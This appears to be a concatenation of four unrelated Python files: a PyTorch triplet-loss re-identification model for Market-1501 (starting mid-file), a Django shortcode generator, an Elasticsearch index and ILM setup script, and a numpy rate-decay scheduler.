max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate,
filters=filters
)
def forward(self, image):
return self.model(image)
class Market1501TripletMiniVGGEval(Market1501TripletMiniVGG):
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletMiniVGGEval, self).__init__(
input_shape=input_shape,
embedding_dim=embedding_dim,
conv_blocks=conv_blocks,
conv_kernel_size=conv_kernel_size,
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate,
filters=filters
)
def forward(self, image):
return self.model(image)
class Market1501TripletMiniVGGReluBeforeBN(nn.Module):
INITIAL_FILTERS = 32
MODEL_NAME = "Mini-VGG"
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletMiniVGGReluBeforeBN, self).__init__()
self.model_name = "Mini-VGG"
start_block = self.__conv_block(
in_channels=input_shape[1],
out_channels=Market1501TripletMiniVGG.INITIAL_FILTERS,
conv_kernel_size=conv_kernel_size,
)
self.backbone = nn.Sequential(start_block)
assert conv_blocks % 2 == 0, "Conv blocks must be an even number in MiniVGGNet"
for idx in range(2, conv_blocks + 1):
current_filters_multiply = int(round((idx / 2) + 0.1, 0))
current_filters = Market1501TripletMiniVGG.INITIAL_FILTERS * current_filters_multiply
_, last_output_channels, _, _ = self.__get_last_shape(input_shape, self.backbone)
self.backbone.add_module(f'Block:{idx}', self.__conv_block(
in_channels=last_output_channels,
out_channels=current_filters,
conv_kernel_size=conv_kernel_size,
))
if idx % 2 == 0:
self.backbone.add_module(f'Pool:{current_filters_multiply}', self.__pool_block(
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate
))
self.backbone.add_module('Flatten', nn.Flatten())
backbone_output_features = self.__get_last_shape(input_shape, self.backbone)[-1]
self.fully_connected = nn.Sequential(
nn.Linear(in_features=backbone_output_features, out_features=512),
nn.BatchNorm1d(num_features=512),
nn.ReLU(),
nn.Linear(in_features=512, out_features=128),
nn.BatchNorm1d(num_features=128),
nn.ReLU(),
nn.Linear(in_features=128, out_features=embedding_dim)
)
self.model = nn.Sequential(self.backbone, self.fully_connected)
@staticmethod
def __get_last_shape(input_shape, block):
return block(torch.rand(input_shape)).shape
@staticmethod
def __pool_block(max_pool_kernel_size, dropout_rate):
return nn.Sequential(
nn.MaxPool2d(kernel_size=max_pool_kernel_size),
nn.Dropout(p=dropout_rate)
)
@staticmethod
def __conv_block(in_channels, out_channels, conv_kernel_size):
return nn.Sequential(
nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=conv_kernel_size,
padding='same',
bias=True
),
nn.BatchNorm2d(num_features=out_channels),
nn.ReLU()
)
def forward(self, anchor, positive, negative):
anchor_emd = self.model(anchor)
positive_emd = self.model(positive)
negative_emd = self.model(negative)
anchor_positive_dist = F.pairwise_distance(anchor_emd, positive_emd)
anchor_negative_dist = F.pairwise_distance(anchor_emd, negative_emd)
return anchor_positive_dist, anchor_negative_dist
class Market1501TripletMiniVGGReluBeforeBnEval(Market1501TripletMiniVGGReluBeforeBN):
def __init__(
self,
input_shape,
embedding_dim,
conv_blocks,
conv_kernel_size=(3, 3),
max_pool_kernel_size=(2, 2),
dropout_rate=0.03,
filters=64
):
super(Market1501TripletMiniVGGReluBeforeBnEval, self).__init__(
input_shape=input_shape,
embedding_dim=embedding_dim,
conv_blocks=conv_blocks,
conv_kernel_size=conv_kernel_size,
max_pool_kernel_size=max_pool_kernel_size,
dropout_rate=dropout_rate,
filters=filters
)
def forward(self, image):
return self.model(image)
if __name__ == '__main__':
from torchinfo import summary
input_shape = (1, 3, 128, 64)
model = Market1501TripletMiniVGG(
input_shape,
embedding_dim=32,
conv_blocks=2,
)
summary(model, (input_shape, input_shape, input_shape))
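    # A minimal forward-pass sketch (not part of the original file): it shows how
    # the (positive, negative) distances returned by forward() could feed a
    # margin-based triplet loss. The batch size, margin value, and eval() call
    # are chosen here only so the snippet runs with the BatchNorm layers above.
    model.eval()
    anchor = torch.rand(4, 3, 128, 64)
    positive = torch.rand(4, 3, 128, 64)
    negative = torch.rand(4, 3, 128, 64)
    with torch.no_grad():
        pos_dist, neg_dist = model(anchor, positive, negative)
    triplet_loss = F.relu(pos_dist - neg_dist + 0.2).mean()
    print(f"example triplet loss: {triplet_loss.item():.4f}")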
|
import string
import random
from django.conf import settings
SHORTCODE_MIN = getattr(settings,"SHORTCODE_MIN",6)
def code_generator(size = SHORTCODE_MIN, chars=string.ascii_lowercase + string.digits):
new_code = ''
for _ in range(size):
new_code += random.choice(chars)
return new_code
# or we simply write
# return ''.join(random.choice(chars) for _ in range(size))
def create_shortcode(instance, size=SHORTCODE_MIN):
new_code = code_generator(size=size)
Klass = instance.__class__
qs_exists = Klass.objects.filter(shortcode = new_code).exists()
if qs_exists:
        # Collision: recurse, passing the instance so the same model is checked again
        return create_shortcode(instance, size=size)
return new_code
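# A minimal usage sketch (not part of the original module). It assumes Django
# settings are already configured (this module reads SHORTCODE_MIN from
# django.conf.settings at import time); create_shortcode additionally needs a
# model instance with a `shortcode` field, so only code_generator is shown.
if __name__ == '__main__':
    print(code_generator())         # e.g. 'k3f9ab'
    print(code_generator(size=10))  # 10-character code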
|
import json
import time
import requests # TODO use only until python lib supports ILM
from requests.auth import HTTPBasicAuth # TODO use only until python lib supports ILM
def _put_towers_mapping(es):
if not es.indices.exists('towers'):
with open('./utilities/config/cell_mapping.json', 'r') as f:
mapping = json.load(f)
es.indices.create('towers', body=mapping)
print('Configured "towers" mapping')
else:
print('"towers" mapping already configured')
def _put_waps_mapping(es):
if not es.indices.exists('waps'):
with open('./utilities/config/waps_mapping.json', 'r') as f:
mapping = json.load(f)
es.indices.create('waps', body=mapping)
print('Configured "waps" mapping')
else:
print('"waps" mapping already configured')
def _put_network_activity_mapping(es, temp_es_host, temp_es_user, temp_es_password):
# Configure ILM
# TODO remove requests call when Python lib supports ILM
try:
r = requests.get('{}/_ilm/policy'.format(temp_es_host), auth=HTTPBasicAuth(temp_es_user, temp_es_password))
r = r.json()['network_events']
except KeyError:
with open('./utilities/config/network_events_ilm_policy.json', 'r') as f:
ilm_policy = json.load(f)
        print('Creating ILM policy "network_events" at', temp_es_host)
r = requests.put(
'{}/_ilm/policy/network_events'.format(temp_es_host),
auth=HTTPBasicAuth(temp_es_user, temp_es_password),
json=ilm_policy
)
print(r.json())
assert r.status_code == 200
# Configure Index Template
if not es.indices.exists_template('network_events'):
with open('./utilities/config/network_events_mapping.json', 'r') as f:
mapping = json.load(f)
es.indices.put_template('network_events', body=mapping)
print('Configured "network_events" template')
else:
print('"network_events" template already configured')
# Bootstrap the first index for ILM rollover purposes if the alias does not exist
if not es.indices.exists_alias('network_events'):
with open('./utilities/config/network_events_bootstrap.json', 'r') as f:
bootstrap = json.load(f)
es.indices.create(index='network_events-000001', body=bootstrap)
def put_all_mappings(es, temp_es_host, temp_es_user, temp_es_password):
_put_towers_mapping(es)
_put_waps_mapping(es)
_put_network_activity_mapping(es, temp_es_host, temp_es_user, temp_es_password)
time.sleep(1)
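# A minimal invocation sketch (not part of the original module). The host and
# credentials below are placeholders; it assumes an elasticsearch-py client and
# the JSON config files referenced above are available.
if __name__ == '__main__':
    from elasticsearch import Elasticsearch
    es_host = 'http://localhost:9200'             # placeholder
    es_user, es_password = 'elastic', 'changeme'  # placeholders
    es = Elasticsearch([es_host], http_auth=(es_user, es_password))
    put_all_mappings(es, es_host, es_user, es_password)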
|
# -*- coding: utf-8 -*-
import numpy as np
#---------------------------------------------------
class RateDecay(object):
    '''Base class for different types of rate decay,
        e.g., teacher forcing ratio, Gumbel temperature,
KL annealing.
'''
def __init__(self, burn_down_steps, decay_steps, limit_v):
self.step = 0
self.rate = 1.0
self.burn_down_steps = burn_down_steps
self.decay_steps = decay_steps
self.limit_v = limit_v
    def decay_function(self):
        # To be overridden by subclasses.
        return self.rate
def do_step(self):
# update rate
self.step += 1
if self.step > self.burn_down_steps:
            self.rate = self.decay_function()
return self.rate
def get_rate(self):
return self.rate
class ExponentialDecay(RateDecay):
def __init__(self, burn_down_steps, decay_steps, min_v):
super(ExponentialDecay, self).__init__(
burn_down_steps, decay_steps, min_v)
self.__alpha = np.log(self.limit_v) / (-decay_steps)
    def decay_function(self):
new_rate = max(np.exp(-self.__alpha*self.step), self.limit_v)
return new_rate
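# A minimal usage sketch (not part of the original module): exponential decay
# from 1.0 down to a floor of 0.1 over 100 steps, after a 10-step burn-in.
# The numbers are arbitrary examples.
if __name__ == '__main__':
    decay = ExponentialDecay(burn_down_steps=10, decay_steps=100, min_v=0.1)
    for _ in range(120):
        decay.do_step()
    print(decay.get_rate())  # close to the 0.1 floor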
|